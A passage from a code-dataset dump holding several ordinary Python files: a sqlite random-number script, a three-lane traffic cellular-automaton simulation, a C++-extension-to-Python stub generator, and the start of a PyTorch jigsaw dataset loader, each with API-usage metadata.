"lib.fileio", "line_number": 178, "usage_type": "name"}, {"api_name": "lib.headerops.get_header", "line_number": 184, "usage_type": "call"}, {"api_name": "lib.headerops", "line_number": 184, "usage_type": "name"}, {"api_name": "lib.headerops.all_same_columns", "line_number": 191, "usage_type": "call"}, {"api_name": "lib.headerops", "line_number": 191, "usage_type": "name"}, {"api_name": "lib.headerops.merge_headers", "line_number": 194, "usage_type": "call"}, {"api_name": "lib.headerops", "line_number": 194, "usage_type": "name"}, {"api_name": "lib.headerops.append_new_pg", "line_number": 195, "usage_type": "call"}, {"api_name": "lib.headerops", "line_number": 195, "usage_type": "name"}, {"api_name": "lib.pairsam_format.COL_C1", "line_number": 219, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 219, "usage_type": "name"}, {"api_name": "lib.pairsam_format.COL_C2", "line_number": 220, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 220, "usage_type": "name"}, {"api_name": "lib.pairsam_format.COL_P1", "line_number": 221, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 221, "usage_type": "name"}, {"api_name": "lib.pairsam_format.COL_P2", "line_number": 222, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 222, "usage_type": "name"}, {"api_name": "lib.pairsam_format.COL_PTYPE", "line_number": 223, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 223, "usage_type": "name"}, {"api_name": "lib.pairsam_format.PAIRSAM_SEP_ESCAPE", "line_number": 224, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 224, "usage_type": "name"}, {"api_name": "subprocess.check_call", "line_number": 254, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 256, "usage_type": "attribute"}]} +{"seq_id": "469460225", "text": "import sqlite3\r\nfrom random import randint\r\n\r\n# create database and connect to it\r\nwith sqlite3.connect(\"newnum.db\") as connection:\r\n\t\r\n\tc = connection.cursor()\r\n\t\r\n\tc.execute(\"DROP TABLE if exists aggregation\")\r\n\t\r\n\tc.execute(\"CREATE TABLE aggregation(num int)\")\r\n\t\r\n\t# insert number into the database\r\n\tfor i in range(100):\r\n\t\tc.execute(\"INSERT INTO aggregation VALUES(?)\",\r\n\t\t(randint(0,100),))\r\n\t\r\n# close connection with the database\r\nc.close()", "sub_path": "numbers1.py", "file_name": "numbers1.py", "file_ext": "py", "file_size_in_byte": 449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sqlite3.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "418762628", "text": "# Ver. 4\n\nimport random\nimport copy\nimport sys\nimport matplotlib.pyplot as plt\nimport collections\n\n\ndef rand_ints_nodup(a, b, k):\n ns = []\n while len(ns) < k:\n n = random.randint(a, b)\n if not n in ns:\n ns.append(n)\n return ns\n\ndef setcar_list(car, line, lines, cell):\n index = rand_ints_nodup(0, (cell-1)*(line-2), car)\n for i in range(car):\n lines[index[i]%3+1][index[i]//3] = 1\n return lines\n\ndef process(line, cell, lines, tmplist):\n forward = 0\n next_forward = 0\n for c in range(cell, -1, -1):\n for l in range(1, line-2+1):\n if lines[l][c] == 1 and c <= cell-1 and (lines[l][c+1] == 0 or lines[l][c+1] == 2):\n forward = 1\n next_forward = 1\n \n # 自分より前にどのくらい空きスペースがあるかどうか\n while(not lines[l][c+forward]):\n forward += 1\n \n # 隣の車線のスペースを算出\n left_forward = 0\n right_forward = 0\n if l==1:\n if lines[l+1][c] == 0: #隣のレーンに車が並んでいないか. 並んでいたらぶつかるかもしれない.\n right_forward = 1\n while(right_forward <= cell - c and not lines[l+1][c+right_forward]):\n right_forward += 1\n next_forward = right_forward\n elif l==2:\n if lines[l-1][c] == 0:\n left_forward = 1\n while(left_forward <= cell - c and not lines[l-1][c+left_forward]):\n left_forward += 1\n next_forward = left_forward\n right_forward = 0\n elif l==3: # lane3は左前が空いていれば強制的にlane2に移動する.\n left_forward = 1\n while(left_forward <= cell - c and not lines[l- 1][c+left_forward]):\n left_forward += 1\n next_forward = left_forward\n \n # 隣の車線の方が空いているとき\n if next_forward > forward and l==1:\n tmplist[l+1][c+1] = 1\n tmplist[l][c] = 0\n elif next_forward > forward and l==2:\n if left_forward:\n tmplist[l-1][c+1] = 1\n tmplist[l][c] = 0\n else:\n tmplist[l+1][c+1] = 1\n tmplist[l][c] = 0\n elif next_forward > forward and l==3:\n tmplist[l-1][c+1] = 1 # 左前に進む\n tmplist[l][c] = 0\n # 前方の方が空いているとき.\n elif next_forward <= forward and lines[l][c+1] == 0:\n if l == 2 and lines[l+1][c] == 1: #lane2で右に車がいれば, 譲る\n tmplist[l][c] = 1\n elif l==3 and lines[l-1][c] == 0 and lines[l-1][c+1] == 0: # lane3 は左に行ける余裕があればいく.\n tmplist[l-1][c+1] = 1\n tmplist[l][c] = 0\n else:\n tmplist[l][c+1] = 1\n tmplist[l][c] = 0\n elif c == cell-1:\n if lines[l][c] == 1 and lines[l][c+1] == 1:\n tmplist[l][c] = 0\n else:\n if lines[l][c] == 1:\n tmplist[l][c] = 1\n return tmplist\n\n\ndef analysis(lines):\n jam = 0\n for i in range(1, 4):\n for j in range(len(lines[0])-2):\n if lines[i][j] == 1 and lines[i][j+1] == 1:\n jam += 1\n return jam\n\ndef main(version):\n cell = 20\n line = 2+3\n lines = [[0]*cell, [0]*cell, [0]*cell, [0]*cell, [0]*cell]\n lines[0] = [2]*(cell+1)\n lines[1].append(1)\n lines[2].append(1)\n lines[3].append(1)\n lines[4] = [2]*(cell+1)\n car = 30\n lines = setcar_list(car, line, lines, cell)\n redc = 8 # cell num for lane reduction\n for i in range(redc):\n lines[3][-2 - i] = 2\n if version == 1:\n lines[3][-cell+3] = 2\n lines[3][-cell+4] = 2\n elif version == 2:\n lines[3][-10] = 2\n lines[3][-11] = 2\n tmplist = copy.deepcopy(lines)\n for i in range(line):\n print(lines[i])\n print()\n \n jamlist = []\n trialnum = 7000\n for _ in range(trialnum):\n tmplist = process(line, cell, lines, tmplist)\n for i in range(1, 4):\n if tmplist[i][0] == 0:\n tmplist[i][0] = random.randint(0,1)\n #for i in range(line):\n # print(tmplist[i])\n #print()\n jamlist.append(analysis(tmplist))\n lines = copy.deepcopy(tmplist)\n \n tmpdic = dict(collections.Counter(jamlist))\n print(tmpdic)\n data = sorted(tmpdic.items(), key=lambda x:x[0])\n dataX = [data[i][0] for i in range(len(data))]\n dataY = [data[i][1] for i in range(len(data))]\n plt.xlabel(\"jam level\")\n plt.ylabel(\"frequency\")\n plt.grid()\n plt.plot(dataX,dataY)\n #fig = plt.figure()\n plt.savefig(\"img{}.png\".format(version))\n plt.show()\n \nif __name__ == \"__main__\":\n main(0)\n main(1)\n main(2)", "sub_path": "ce-automaton.py", "file_name": "ce-automaton.py", "file_ext": "py", "file_size_in_byte": 5350, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.randint", "line_number": 13, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 120, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 131, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 136, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}]} +{"seq_id": "626891061", "text": "#!/usr/bin/python\n\n# Copyright (c) 2021, Takuma.\n# Respect intellectual property, and do not delete these comments.\n# Thanks to Gurgarath for his help !\n\n# -*- coding: -*-\n\nimport glob\nimport os\nimport re\nfrom typing import *\nfrom typing import IO\n\n__author__ = \"Takuma\"\n__version__ = \"1.0\"\n__status__ = \"development\"\n\n# CONFIGURATION BLOCK\nOUTPUT_DIRECTORY: str = 'bin'\nINPUT_DIRECTORY: str = 'src'\n\n# DEVELOPMENT CONSTANTS\nFUNCTIONS_TYPE_CORRESPONDENCES: dict = {\n\t\"GetLong\": \"int\",\n\t\"GetDouble\": \"int\",\n\t\"GetFloat\": \"float\",\n\t\"GetByte\": \"int\",\n\t\"GetInteger\": \"int\",\n\t\"GetUnsignedLong\": \"int\",\n\t\"GetUnsignedInteger\": \"int\",\n\t\"GetString\": \"str\",\n\t\"GetWindow\": \"int\",\n\t\"GetBoolean\": \"bool\",\n\t\"GetTextInstance\": \"int\",\n\t\"GetThingInstance\": \"int\",\n\t\"GetImageInstance\": \"int\",\n\t\"GetExpandedImageInstance\": \"int\",\n\t\"GetObject\": \"object\"\n}\n\nLETTER_TYPE_CORRESPONDENCES: dict = {\n\t'i': \"int\",\n\t's': \"str\",\n\t'c': \"int\",\n\t'l': \"int\",\n\t'f': \"float\",\n\t'b': \"bool\"\n}\n\nCONSTANTS_FUNCTION: Dict[str, type] = {\n\t\"PyModule_AddIntConstant\": int,\n\t\"PyModule_AddStringConstant\": str\n\t# Add new type in Constant's render method\n}\n\nRESERVED_KEYWORD: list = [\n\t\"False\", \"def\", \"if\", \"raise\", \"None\", \"del\", \"import\", \"return\", \"True\", \"elif\", \"in\", \"try\", \"and\", \"else\", \"is\",\n\t\"while\", \"as\", \"except\", \"lambda\", \"with\", \"assert\", \"finally\", \"nonlocal\", \"yield\", \"break\", \"for\", \"not\", \"class\",\n\t\"from\", \"or\", \"continue\", \"global\", \"pass\"\n]\n\n\ndef get_python_type_by_function(arg_type: str) -> str:\n\t\"\"\"\n\tReturn python type for c++ arg_type with function as reference\n\t:param arg_type: argument's type in C++\n\t:return: Python's equivalent for arg_type\n\t\"\"\"\n\tif arg_type in FUNCTIONS_TYPE_CORRESPONDENCES:\n\t\treturn FUNCTIONS_TYPE_CORRESPONDENCES[arg_type]\n\traise Exception(\"Unknown C++ type: {}\".format(arg_type))\n\n\ndef get_python_type_by_letter(arg_type: str) -> str:\n\t\"\"\"\n\tReturn python type for c++ arg_type with letter as reference\n\t:param arg_type: argument's type in C++\n\t:return: Python's equivalent for arg_type\n\t\"\"\"\n\tif arg_type in LETTER_TYPE_CORRESPONDENCES:\n\t\treturn LETTER_TYPE_CORRESPONDENCES[arg_type]\n\traise Exception(\"Unknown C++ type: {}\".format(arg_type))\n\n\ndef comment_remover(text) -> str:\n\t\"\"\"\n\tRemove comments from C++ text\n\t:param text: str: C++ code\n\t:return: str: code uncomment.\n\t\"\"\"\n\n\tdef replacer(match):\n\t\ts: str = match.group(0)\n\t\tif s.startswith('/'):\n\t\t\treturn \" \"\n\t\telse:\n\t\t\treturn s\n\n\tpattern = re.compile(\n\t\tr'//.*?$|/\\*.*?\\*/|\\'(?:\\\\.|[^\\\\\\'])*\\'|\"(?:\\\\.|[^\\\\\"])*\"',\n\t\tre.DOTALL | re.MULTILINE\n\t)\n\treturn re.sub(pattern, replacer, text)\n\n\ndef write_head_block(file: IO, ) -> NoReturn:\n\t\"\"\"\n\tWrite in file the common file's header\n\t:param file: file\n\t\"\"\"\n\tfile.write(\"\"\"from typing import *\n\n\n__author__ = \"Takuma\"\n__version__ = \"1.0\"\n__status__ = \"development\"\n\n\n# Copyright (c) 2021, Takuma.\n# Respect intellectual property, and do not delete these comments.\n# Thanks to Gurgarath for his help for one regex !\n\"\"\")\n\n\ndef check_render_space() -> NoReturn:\n\t\"\"\"\n\tCheck if render file can be created by check if output directory is/can be created\n\t\"\"\"\n\tif not os.path.exists(OUTPUT_DIRECTORY):\n\t\ttry:\n\t\t\tos.makedirs(\"bin\")\n\t\texcept Exception:\n\t\t\traise Exception(\"Can't create output directory\")\n\n\nclass Argument:\n\t\"\"\"\n\tModel an argument, and allows to determine its equivalent in Python.\n\t\"\"\"\n\n\tdef __init__(self, name: str, arg_type: Union[str, None]) -> NoReturn:\n\t\t\"\"\"\n\t\tArgument class constructor.\n\t\t:param name: Argument's name\n\t\t:param arg_type: Argument's type\n\t\t\"\"\"\n\t\tself.name: str = name\n\t\tself.arg_type: Union[str, None] = arg_type\n\t\tself.check_name()\n\n\tdef check_name(self) -> NoReturn:\n\t\t\"\"\"\n\t\tCheck if name doesn't contains reserved word\n\t\t\tExample:\n\t\t\t\tIt changes from to _from\n\t\t\t\tIt changes cWindows->Var to cWindows_Var\n\t\t\"\"\"\n\t\tif self.name in RESERVED_KEYWORD:\n\t\t\tself.name = '_' + self.name\n\t\tself.name = self.name.replace(\".\", \"_\")\n\n\tdef render(self) -> Union[str, None]:\n\t\t\"\"\"\n\t\tGet Python's equivalent of current argument\n\t\t:return: str: \"name: type\"\n\t\t\"\"\"\n\t\tif self.name and self.arg_type:\n\t\t\treturn f\"{self.name}: {(get_python_type_by_function(self.arg_type))}\"\n\t\telif self.name:\n\t\t\treturn f\"{self.name}\"\n\n\tdef __str__(self) -> str:\n\t\t\"\"\"\n\t\tGet Argument's name\n\t\t:return: str: Argument's name\n\t\t\"\"\"\n\t\treturn self.name\n\n\nclass Method:\n\t\"\"\"\n\tModeling and processing of a function\n\t\"\"\"\n\n\tdef __init__(self) -> NoReturn:\n\t\t\"\"\"\n\t\tInitialization for Function class\n\t\t\"\"\"\n\t\tself.name: str = str()\n\t\tself.arguments: List[Argument] = list()\n\t\tself.returned_value: Union[None, str] = None\n\t\tself.content: str = str()\n\t\tself.f_return: List[Argument] = list()\n\n\tdef set_name(self, name: str) -> NoReturn:\n\t\t\"\"\"\n\t\tSet function's name\n\t\t:param name: str: Function's name\n\t\t\"\"\"\n\t\tself.name = name\n\n\tdef add_argument(self, argument: Argument) -> NoReturn:\n\t\t\"\"\"\n\t\tAdd one function's argument\n\t\t:param argument: Argument: arg\n\t\t\"\"\"\n\t\tself.arguments.append(argument)\n\n\tdef get_name(self) -> str:\n\t\t\"\"\"\n\t\tGet function's name\n\t\t:return: str: function's name\n\t\t\"\"\"\n\t\treturn self.name\n\n\tdef set_content(self, content: str) -> NoReturn:\n\t\t\"\"\"\n\t\tSet function's content\n\t\t:param content: str: function's content\n\t\t\"\"\"\n\t\tself.content = content\n\n\tdef set_returned_value(self, value: str) -> NoReturn:\n\t\t\"\"\"\n\t\tSet function's returned values\n\t\t:param value: str: value\n\t\t\"\"\"\n\t\tself.returned_value = value\n\n\tdef get_argument(self, index: int = -1) -> Union[List[Argument], Argument]:\n\t\t\"\"\"\n\t\tGet argument(s)\n\t\t:param index: index of element\n\t\t:return: Union[List[Argument], Argument]: argument(s)\n\t\t\"\"\"\n\t\tif 0 <= index < len(self.arguments):\n\t\t\treturn self.arguments[index]\n\t\treturn self.arguments\n\n\tdef process(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRead content and parse arguments + return\n\t\t\"\"\"\n\t\targs_matches = re.findall(\"PyTuple_(.*)\\(.*,\\s*(.*)\\s*,\\s*&(.*)\\)\\)\", self.content)\n\t\targs_matches = sorted(args_matches, key=lambda tup: tup[1])\n\t\tused_id: List[int] = list()\n\t\tunknown_format: bool = False\n\t\tfor match in args_matches:\n\t\t\tif match[2] not in used_id:\n\t\t\t\tused_id.append(match[2])\n\t\t\telse:\n\t\t\t\tunknown_format = True\n\t\tif unknown_format:\n\t\t\targ_count: int = int(max(args_matches, key=lambda index: index[1])[1])\n\t\t\tfor i in range(0, arg_count + 1):\n\t\t\t\targument: Argument = Argument(f\"unknown_{i}=None\", None)\n\t\t\t\tself.add_argument(argument)\n\t\t\treturn\n\n\t\tfor match in args_matches:\n\t\t\targ: Argument = Argument(match[2], match[0])\n\t\t\tself.add_argument(arg)\n\n\t\treturn_match: List = re.findall(\"return\\s*Py_BuildValue\\(\\\"(.*)\\\"\", self.content)\n\t\tif return_match:\n\t\t\tif len(return_match) == 1:\n\t\t\t\treturn_format: str = return_match[0].replace('#', '').replace('*', '') # Remove unknown char Python\n\t\t\t\tif len(return_format) == 1:\n\t\t\t\t\tself.set_returned_value(get_python_type_by_letter(return_format.lower()))\n\t\t\t\telse:\n\t\t\t\t\toutput_str: str = \"Tuple[\"\n\t\t\t\t\tfor letter in return_format:\n\t\t\t\t\t\tif letter == '(':\n\t\t\t\t\t\t\toutput_str += \"Tuple[\"\n\t\t\t\t\t\telif letter == ')':\n\t\t\t\t\t\t\toutput_str += \"], \"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\toutput_str += get_python_type_by_letter(letter.lower())\n\t\t\t\t\t\t\toutput_str += \", \"\n\t\t\t\t\toutput_str = output_str[:-2] + \"]\"\n\t\t\t\t\tself.set_returned_value(output_str)\n\n\tdef render(self) -> str:\n\t\t\"\"\"\n\t\tRender a function\n\t\t:return: str: function's render\n\t\t\"\"\"\n\t\tif self.name != str():\n\t\t\trender: str = f\"def {self.name}(\" # def xxx(self,_\n\n\t\t\t# Arguments\n\t\t\tif self.arguments:\n\t\t\t\tfor arg in self.arguments:\n\t\t\t\t\trender += arg.render() + \", \"\n\t\t\t\trender = render[:-2] + \")\"\n\t\t\telse:\n\t\t\t\trender += \")\"\n\n\t\t\t# Return\n\t\t\trender += \" -> \"\n\t\t\tif self.returned_value:\n\t\t\t\trender += self.returned_value\n\t\t\telse:\n\t\t\t\trender += \"NoReturn\"\n\t\t\trender += \":\"\n\n\t\t\t# Body\n\t\t\trender += \"\\n\\tpass\\n\"\n\n\t\t\treturn render\n\t\treturn \"\"\n\n\tdef __str__(self) -> str:\n\t\t\"\"\"\n\t\tString for represent a functions\n\t\t:return: str: representation\n\t\t\"\"\"\n\t\treturn \"{}({})\".format(\n\t\t\tself.name,\n\t\t\t\", \".join(str(arg) for arg in self.arguments)\n\t\t)\n\n\nclass Constant:\n\t\"\"\"\n\tClass to modeling a constant\n\t\"\"\"\n\n\tdef __init__(self, name: str, value: type) -> NoReturn:\n\t\t\"\"\"\n\t\tInitialization of Constant\n\t\t:param name: str: Constant's name\n\t\t:param value: Union[str, int]: Constant's value\n\t\t\"\"\"\n\t\tself.name: str = name\n\t\tself.value: type = value\n\n\tdef render(self) -> str:\n\t\t\"\"\"\n\t\tReturn a string who represents the constant in Python\n\t\t:return: str: representation\n\t\t\"\"\"\n\t\ttype_output: Union[str, int] = \"\"\n\t\tif self.value is int:\n\t\t\ttype_output = 1\n\t\telif self.value is str:\n\t\t\ttype_output = \"''\"\n\t\treturn f\"{self.name} = {type_output}\"\n\n\tdef __str__(self) -> str:\n\t\t\"\"\"\n\t\tRepresentation in Python\n\t\t:return: str: representation\n\t\t\"\"\"\n\t\treturn f\"{self.name} = {self.value}\"\n\n\nclass SrcFile:\n\t\"\"\"\n\tModeling of one source file\n\t\"\"\"\n\n\tdef __init__(self, path: str) -> NoReturn:\n\t\t\"\"\"\n\t\tInitialization for SrcFile class\n\t\t\"\"\"\n\t\tself.path: str = path\n\t\tself.lines: List[str] = list()\n\t\tself.module_name: str = str()\n\t\tself.methods_dic_name: str = str()\n\t\tself.constants: List[Constant] = list()\n\t\tself.constants_name: List[str] = list()\n\t\tself.methods: Dict[str, str] = dict() # s_methods\\[\\]((.|\\n)*){((.|_n)*)} --> {.*\\\"(.*)\\\",(.*),.*} --> strip\n\t\tself.methods_list_contents: Dict[str, str] = dict() # PyObject\\s*\\*\\s*(.*)\\(.*\\)(.|\\n*){(.|\\n)*?}\n\t\tself.methods_object: List[Method] = list()\n\n\tdef read_lines(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRead files in utf-8 and save them\n\t\t\"\"\"\n\t\twith open(self.path, \"r+\", encoding=\"utf-8\", errors=\"ignore\") as file:\n\t\t\tself.lines = file.readlines()\n\n\tdef read_module_name(self) -> NoReturn:\n\t\t\"\"\"\n\t\tSearch line with module and get his name\n\t\t\"\"\"\n\t\tfor line in self.lines:\n\t\t\tif \"Py_InitModule(\" in line:\n\t\t\t\tgroups = re.search(\"Py_InitModule\\(\\\\\\\"(.*?)\\\\\\\",\\s*(.*)\\)\", line)\n\t\t\t\tif groups:\n\t\t\t\t\tgroups = groups.groups()\n\t\t\t\tself.module_name = groups[0]\n\t\t\t\tself.methods_dic_name = groups[1]\n\n\tdef read_module_content(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRead module content to find method and her content\n\t\t\"\"\"\n\t\tcontent: str = \"\".join(self.lines)\n\t\tcontent = comment_remover(content)\n\t\tmethods: Match = re.search(self.methods_dic_name + '\\[]((.|\\n)*){((.|_n)*)}', content)\n\n\t\tif not methods:\n\t\t\treturn\n\n\t\tmethods_group: str = methods.groups()[0]\n\t\tmethods_list: list = re.findall('{.*\\\"(.*)\\\",\\t*(.*),.*}', methods_group)\n\t\tif methods_list:\n\t\t\tfor m in methods_list:\n\t\t\t\tif len(m) == 2:\n\t\t\t\t\tself.methods[m[1].strip()] = m[0].strip()\n\t\toccurrences: List = re.findall(\"PyObject\\s*\\*\\s*(.*)\\(.*\\)\\s*{((?:[^{}]+|{([^{}]+)}){3})}\", content)\n\t\tfor occurrence in occurrences:\n\t\t\tself.methods_list_contents[occurrence[0]] = occurrence[1]\n\n\t\tto_delete: list = list()\n\t\tfor method in self.methods_list_contents:\n\t\t\tif method not in self.methods.keys():\n\t\t\t\tto_delete.append(method)\n\t\tfor method in to_delete:\n\t\t\tself.methods_list_contents.pop(method)\n\n\tdef read_functions(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRead all functions name, create object and work on it\n\t\t:return:\n\t\t\"\"\"\n\t\tfor method in self.methods_list_contents:\n\t\t\tfunction = Method()\n\t\t\tfunction.set_name(self.methods[method])\n\t\t\tfunction.set_content(self.methods_list_contents[method])\n\t\t\tfunction.process()\n\t\t\tself.methods_object.append(function)\n\n\tdef read_constant(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRead file's content to find constant and add them to the class\n\t\t\"\"\"\n\t\tcontent: str = \"\".join(self.lines)\n\t\tfor constant_declaration in CONSTANTS_FUNCTION.keys():\n\t\t\tconstants: List = re.findall(\"{}\\(.*\\\"(.*)\\\",\\s*.*\\)\".format(\n\t\t\t\tconstant_declaration\n\t\t\t), content)\n\t\t\tfor constant in constants:\n\t\t\t\tif constant not in self.constants_name:\n\t\t\t\t\tself.constants_name.append(constant)\n\t\t\t\t\tself.constants.append(Constant(\n\t\t\t\t\t\tconstant,\n\t\t\t\t\t\tCONSTANTS_FUNCTION[constant_declaration]\n\t\t\t\t\t))\n\n\tdef process(self) -> NoReturn:\n\t\t\"\"\"\n\t\tWork on the file\n\t\t\"\"\"\n\t\tself.read_lines()\n\t\tself.read_module_name()\n\t\tself.read_module_content()\n\t\tself.read_functions()\n\t\tself.read_constant()\n\n\tdef render(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRender a module\n\t\t\"\"\"\n\t\tif self.module_name == \"\" or not self.methods_object:\n\t\t\treturn\n\t\tcheck_render_space()\n\t\twith open(f\"{OUTPUT_DIRECTORY}/{self.module_name}.py\", \"w\", encoding=\"utf-8\") as rendering_file:\n\t\t\tprint(f\"Rendering {self.module_name}...\")\n\t\t\twrite_head_block(rendering_file)\n\t\t\tfor constant in self.constants:\n\t\t\t\trendering_file.write(\"\\n\")\n\t\t\t\trendering_file.write(constant.render())\n\t\t\tfor method in self.methods_object:\n\t\t\t\trendering_file.write(\"\\n\\n\")\n\t\t\t\trendering_file.write(method.render())\n\n\tdef has_module(self) -> bool:\n\t\t\"\"\"\n\t\tIf file has module\n\t\t:return: bool: has module\n\t\t\"\"\"\n\t\treturn self.module_name != str()\n\n\tdef __str__(self) -> str:\n\t\t\"\"\"\n\t\tMake string who represent SrcFile current object\n\t\t:return: str: representation\n\t\t\"\"\"\n\t\treturn self.path\n\n\nclass SrcFiles:\n\t\"\"\"\n\tClass for processing on multiple SrcFile\n\t\"\"\"\n\n\tdef __init__(self, path: str) -> NoReturn:\n\t\t\"\"\"\n\t\tInitialization of class\n\t\t:param path: str: path of files\n\t\t\"\"\"\n\t\tself.files: List[SrcFile] = list()\n\t\tself.path: str = path\n\n\tdef add_file(self, file: str) -> NoReturn:\n\t\t\"\"\"\n\t\tAdd SrcFile's path\n\t\t:param file: str: path\n\t\t\"\"\"\n\t\tcurrent_file: SrcFile = SrcFile(file)\n\t\tself.files.append(current_file)\n\n\tdef remove_file(self, file: SrcFile) -> NoReturn:\n\t\t\"\"\"\n\t\tRemove path from list\n\t\t:param file: src: file's path to delete\n\t\t\"\"\"\n\t\tself.files.remove(file)\n\n\tdef process(self) -> NoReturn:\n\t\t\"\"\"\n\t\tProcessing on each SrcFile\n\t\t\"\"\"\n\t\tinput_files = glob.glob(f\"{self.path}/*\", recursive=True)\n\t\tfor file in input_files:\n\t\t\tif os.path.exists(file):\n\t\t\t\tself.add_file(file)\n\n\t\tfor file in self.files:\n\t\t\tfile.process()\n\n\t\tfor file in self.files:\n\t\t\tif not file.has_module():\n\t\t\t\tself.remove_file(file)\n\n\t\tfor file in self.files:\n\t\t\tfile.render()\n\n\tdef __str__(self) -> str:\n\t\t\"\"\"\n\t\tMaking string to represent class\n\t\t:return: str: representation\n\t\t\"\"\"\n\t\treturn f\"[{', '.join(str(x) for x in self.files)}]\"\n\n\ndef process() -> NoReturn:\n\t\"\"\"\n\tInitialize SrcFiles objet, and start process.\n\t\"\"\"\n\tprint(\"Getting all files in src directory\")\n\n\tfiles = SrcFiles(INPUT_DIRECTORY)\n\tfiles.process()\n\n\nif __name__ == '__main__':\n\tprint(\"Welcome !\")\n\tprint(\"I was coded by Takuma! A Frenchman who loves baguettes!\")\n\tprint(\"This tools only support one module per files...\")\n\tprint(\"And module initialisation have to be on only one line.\")\n\tprint(\"As it's by default.\")\n\tprocess()\n\tprint(\"Ended.\")\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 14160, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "re.compile", "line_number": 100, "usage_type": "call"}, {"api_name": "re.DOTALL", "line_number": 102, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 102, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 104, "usage_type": "call"}, {"api_name": "typing.IO", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 132, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 245, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 265, "usage_type": "call"}, {"api_name": "re.search", "line_number": 391, "usage_type": "call"}, {"api_name": "re.search", "line_number": 403, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 409, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 414, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 443, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 528, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path", "line_number": 530, "usage_type": "attribute"}]} +{"seq_id": "507002957", "text": "# This code is modified from https://github.com/facebookresearch/low-shot-shrink-hallucinate\n\nimport torch\nfrom PIL import Image\nimport json\nimport numpy as np\nimport torchvision.transforms as transforms\nimport os\n\n# jigsaw patch positions\npatch_xl = np.array([0,0,0,74,74,74,148,148,148])\npatch_xr = np.array([74,74,74,148,148,148,224,224,224])\npatch_yl = np.array([0,74,148,0,74,148,0,74,148])\npatch_yr = np.array([74,148,224,74,148,224,74,148,224])\n\nidentity = lambda x:x\nclass SimpleDataset:\n def __init__(self, data_file, transform, target_transform=identity):\n with open(data_file, 'r') as f:\n self.meta = json.load(f)\n self.transform = transform\n self.target_transform = target_transform\n\n\n def __getitem__(self,i):\n image_path = os.path.join(self.meta['image_names'][i])\n img = Image.open(image_path).convert('RGB')\n img = self.transform(img)\n target = self.target_transform(self.meta['image_labels'][i])\n return img, target\n\n def __len__(self):\n return len(self.meta['image_names'])\n\nclass JigsawDataset:\n def __init__(self, data_file, transform, max_replace_block_num=4, target_transform=identity):\n self.max_replace_block_num = max_replace_block_num\n self.transform = transform\n self.target_transform = target_transform\n\n with open(data_file, 'r') as f:\n self.meta = json.load(f)\n self.cl_list = np.unique(self.meta['image_labels']).tolist()\n\n self.sub_meta = {}\n for cl in self.cl_list:\n self.sub_meta[cl] = []\n\n for x, y in zip(self.meta['image_names'], self.meta['image_labels']):\n self.sub_meta[y].append(x)\n\n self.meta['image_labels'] = np.array(self.meta['image_labels'])\n\n self.original_size = len(self.meta['image_names'])\n\n def __getitem__(self, i):\n image_path = os.path.join(self.meta['image_names'][i])\n img = Image.open(image_path).convert('RGB')\n img = self.transform(img)\n target = self.target_transform(self.meta['image_labels'][i])\n\n # ori_im = img.clone()\n\n if self.max_replace_block_num == 0:\n replace_block_num = 0\n replaced_indexs = []\n else:\n replace_block_num = np.random.randint(1, self.max_replace_block_num+1)\n replaced_indexs = np.random.choice(9, replace_block_num, replace=False)\n\n is_same_cls = np.random.randint(0, 2)\n\n if is_same_cls == 0: # use a random image\n choose = np.random.randint(0, self.original_size)\n auxiliary_image_path = 